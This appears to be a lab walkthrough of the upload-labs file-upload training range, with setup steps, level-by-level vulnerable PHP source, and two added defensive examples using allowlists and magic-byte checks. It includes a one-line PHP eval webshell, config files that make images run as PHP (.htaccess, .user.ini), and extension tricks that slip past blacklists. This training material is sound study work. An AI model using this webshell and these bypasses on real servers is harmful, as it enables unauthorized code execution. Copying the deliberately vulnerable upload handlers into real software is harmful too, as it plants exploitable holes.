Environment setup
Windows setup
upload-labs
An open-source target range built specifically for learning and testing file upload vulnerabilities.
c0ny1/upload-labs: a lab that tries to summarize every type of upload vulnerability (GitHub is sometimes slow to reach from within China).
phpstudy2018
After installing phpstudy, place the extracted upload-labs folder in the PHPTutorial\WWW directory under the phpstudy installation path.
If you use the XiaoPi panel (小皮面板), place it in the WWW directory, and pay attention to the PHP version.
Burpsuite
Used for intercepting and modifying requests.
Verification
Open phpstudy and click Start.
Enter localhost (or 127.0.0.1) in the browser; if the page returns Hello world, phpstudy is installed and reachable.
Enter localhost/upload-labs/ (or 127.0.0.1/upload-labs) in the browser; if the page below appears, upload-labs is installed successfully.
Commonly used test code
One-line webshell
<?php @eval($_POST['cmd']); ?>
phpinfo
<?php phpinfo(); ?>
Levels
Pass-01 (JS bypass)
(There are many methods; here we use Burp to intercept the request and modify the extension.)
1. First look at the source: only .jpg/.png/.gif files are allowed.
2. Upload a php file disguised as a normal image. The request captured in Burp shows that a file was uploaded, but the image address cannot be accessed.
3. In the captured request you can see the uploaded content. Send the request to Repeater, change the file name's extension, click Send, and check the response. (Correction: I changed the uploaded content to phpinfo(); and resent it, a small slip.) The img field contains an upload address; copy it into the browser and the page below appears.
Pass-02 (MIME validation)
Method 1: upload an image file, then modify the extension. Rename the php file to .jpg, upload it, and change the extension back in the request captured by Burp.
You then get an upload address; copy it into the browser and you get the following:
Method 2: upload a php file, then modify the Content-Type. First upload a normal image and look at the request in Burp.
You can see the Content-Type is image/jpeg. Now upload a php file; its Content-Type is application/octet-stream. Send that request to Repeater, change the Content-Type to image/jpeg, click Send, and check the response. You get an upload address; copy it into the browser, and the content is as follows:
Pass-03 (blacklist bypass: special extensions)
Looking at the level 3 source, the common bypass methods are strictly restricted, so, building on levels 1 and 2, the extension can be modified. In certain environments some special extensions are parsed as php files, such as php, php1, php2, php3, php4, php5, php6, php7, pht, phtm, phtml. Upload a .php3 file to try it; the upload succeeds. Look at the request content in Burp.
You get an upload address; copy it into the browser and the page shows nothing. Apache's configuration needs to be modified so that php3 files are parsed as php: edit Apache's httpd.conf, add .php3 to this line, and restart the service.
AddType application/x-httpd-php .php .phtml .php3
Then refresh the page and you can see the following:
Pass-04 (blacklist bypass: .htaccess)
First look at the source code.
You can see this level restricts a great many file types, but it does not restrict .htaccess files.
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
You can craft a .htaccess to bypass the check. Upload a .htaccess:
<FilesMatch "3.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
This file tells Apache to parse 3.jpg as php whenever it encounters that file.
Prepare a 3.jpg (a php file with its extension renamed). Upload .htaccess and 3.jpg to the server separately; checking the local files, you can see both have been uploaded successfully.
Then copy the image address and visit it; the following page is shown:
Pass-05 (blacklist bypass: .user.ini)
First look at the source code:
This level's denied list now also contains .htaccess:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
Compared with level 4's restrictions, .ini is not restricted.
Since PHP 5.3.0, PHP supports per-directory .user.ini files, which are similar to .htaccess files. In addition to php.ini, PHP also looks for a .user.ini in each directory, and the settings in a .user.ini file are processed by PHP just like the settings in php.ini.
1. Create a .user.ini file and upload it:
auto_prepend_file=4.jpg
This file means that every php file automatically includes 4.jpg; .user.ini acts as a custom php.ini.
Then upload 4.jpg.
The upload succeeds. Visit the previously uploaded 1.php in the browser; the following page appears:
Pass-06 (blacklist bypass: case bypass)
First look at the source; its restrictions are as follows:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the file name
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading and trailing whitespace
Compared with the previous levels, this level lacks the conversion to lowercase. First upload a php file, then use Burp to change 1.php to 1.Php (looking at the restricted types, a capitalized first letter is not blocked).
Visit its upload address and you get the following:
[Only works on Windows, because Windows file names are case-insensitive]
Pass-07 (blacklist validation: space bypass)
First look at the source code:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name); // strip trailing dots from the file name
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
Compared with the previous level, this one lacks the whitespace trim. So try a space bypass: first upload a php file and look at the request in Burp.
Add a space after the file name and resend the request; you get an upload address. Copy it into the browser and access it with HackBar, which gives the following page:
Pass-08 (blacklist bypass: trailing dot bypass)
First look at the source code:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading and trailing whitespace
Compared with the previous level, this one does not call deldot to strip trailing dots from the file name, so a trailing-dot bypass can be used.
The hint is as follows:
Look at the request content in Burp.
Use Burp to change 5.php to 5.php., and you get a file upload path.
Use HackBar to access that path and execute a command; you get the following page:
Pass-09 (blacklist bypass: special string ::$DATA bypass)
First look at the source code:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the file name
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = trim($file_ext); // trim leading and trailing whitespace
Compared with the previous level, this one does not filter ::$DATA, so ::$DATA can be used for the bypass. Use Burp to change 5.php to 5.php::$DATA, and you get a file upload address.
Remove the ::$DATA and use HackBar to access the upload address; you get the following page:
Pass-10 (blacklist bypass-)
First look at the source code:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the file name
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading and trailing whitespace
Pass-11
First look at the source code:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext, "", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}
Hint for this level:
Pass-12
First look at the source code:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}
The hint is as follows:
Pass-13
Look at the source code:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}
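The blacklist levels (Pass-06 to Pass-10) each fail because one normalization step (lowercasing, trimming, deldot, the ::$DATA strip) is missing, and Pass-12/Pass-13 additionally let the client choose save_path. The following is an added example, not upload-labs code, of the allowlist approach a defender would use instead: decide from an allowlist of extensions, ignore any client-supplied path, and generate the stored file name on the server. The function names allowed_extension and safe_upload_path, the upload directory and the sample names are my own.

```php
<?php
// Added example (not upload-labs code): allowlist-based validation that does
// not depend on reproducing every blacklist normalization step one by one.
const ALLOWED_EXT = ['jpg', 'png', 'gif'];

// Returns the allowlisted extension of $client_name, or null if the name must
// be rejected. Every quirk the blacklist levels handle separately (case,
// trailing space or dot, ::$DATA, dotfiles such as .htaccess and .user.ini)
// is rejected here simply because the result is not on the allowlist.
function allowed_extension(string $client_name): ?string {
    // Keep only the last path segment: the client never chooses a directory.
    $base = basename(str_replace('\\', '/', $client_name));
    // Reject NTFS alternate data stream syntax and control characters outright.
    if (strpos($base, '::') !== false || preg_match('/[\x00-\x1f]/', $base)) {
        return null;
    }
    $dot = strrpos($base, '.');
    // No dot at all, or a name that is only an extension (".htaccess").
    if ($dot === false || $dot === 0) {
        return null;
    }
    $ext = substr($base, $dot + 1);
    // Strict, case-sensitive match: "Php", "php " and "" (from "5.php.") fail.
    return in_array($ext, ALLOWED_EXT, true) ? $ext : null;
}

// Server-chosen target path: fixed directory (never $_GET/$_POST['save_path']),
// random file name, validated extension.
function safe_upload_path(string $upload_dir, string $client_name): ?string {
    $ext = allowed_extension($client_name);
    if ($ext === null) {
        return null;
    }
    return rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, taken from the file names used in the levels above.
$samples = ['photo.jpg', '1.Php', '5.php ', '5.php.', '5.php::$DATA',
            '.htaccess', '.user.ini', 'shell.php3', '../etc/x.png'];
foreach ($samples as $name) {
    $path = safe_upload_path('/var/www/uploads', $name);
    printf("%-16s -> %s\n", json_encode($name), $path ?? 'rejected');
}
```

Only photo.jpg and ../etc/x.png (reduced to x.png) receive a path; the extension allowlist is still one layer, so the upload directory should also be one where the web server does not execute scripts and does not honour per-directory configuration files.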
Pass-14
Look at the source code:
function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}
Hint for this level:
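getReailFileType above reads two bytes, converts each to its decimal value, concatenates them as strings and compares the integer: 0xFF 0xD8 becomes 255216 (JPEG), 0x89 'P' becomes 13780 (PNG) and 'G' 'I' becomes 7173 (GIF). Because the concatenation is done on decimal strings, the pair 7,173 (bytes 0x07 0xAD) also yields 7173. The following is an added example, not upload-labs code, that reproduces the level's rule on an in-memory string beside a plain byte-prefix comparison against the full signatures; the function names, the SIGNATURES table and the constructed inputs are my own.

```php
<?php
// Added example (not upload-labs code): the Pass-14 check concatenates two
// byte values as decimal strings, so distinct byte pairs can collide. A raw
// byte-prefix comparison against full signatures has no such ambiguity.

// Same classification rule as getReailFileType, applied to an in-memory string.
function type_by_decimal_concat(string $bin): string {
    $c = unpack('C2chars', $bin);   // yields keys chars1 and chars2
    switch (intval($c['chars1'] . $c['chars2'])) {
        case 255216: return 'jpg';
        case 13780:  return 'png';
        case 7173:   return 'gif';
        default:     return 'unknown';
    }
}

// Full magic signatures; comparing raw bytes avoids the decimal collision.
const SIGNATURES = [
    'jpg' => "\xFF\xD8\xFF",
    'png' => "\x89PNG\r\n\x1A\n",
    'gif' => "GIF8",               // covers GIF87a and GIF89a
];

function type_by_signature(string $bin): string {
    foreach (SIGNATURES as $type => $sig) {
        if (strncmp($bin, $sig, strlen($sig)) === 0) {
            return $type;
        }
    }
    return 'unknown';
}

// Constructed inputs: a real GIF header, a real PNG header, and a file whose
// first two bytes are 0x07 0xAD (decimal 7 and 173), which the decimal rule
// also reads as "7173".
$inputs = [
    'real_gif'  => "GIF89a" . str_repeat("\x00", 10),
    'real_png'  => "\x89PNG\r\n\x1A\n" . str_repeat("\x00", 10),
    'collision' => "\x07\xAD" . str_repeat("\x00", 10),
];
foreach ($inputs as $label => $data) {
    printf("%-9s decimal=%-8s signature=%s\n", $label,
        type_by_decimal_concat($data), type_by_signature($data));
}
```

The collision input is classified as gif by the decimal rule and as unknown by the signature rule; even the signature rule only proves that a file begins like an image, so the result should decide the stored extension and nothing more, with uploads kept where scripts are not executed.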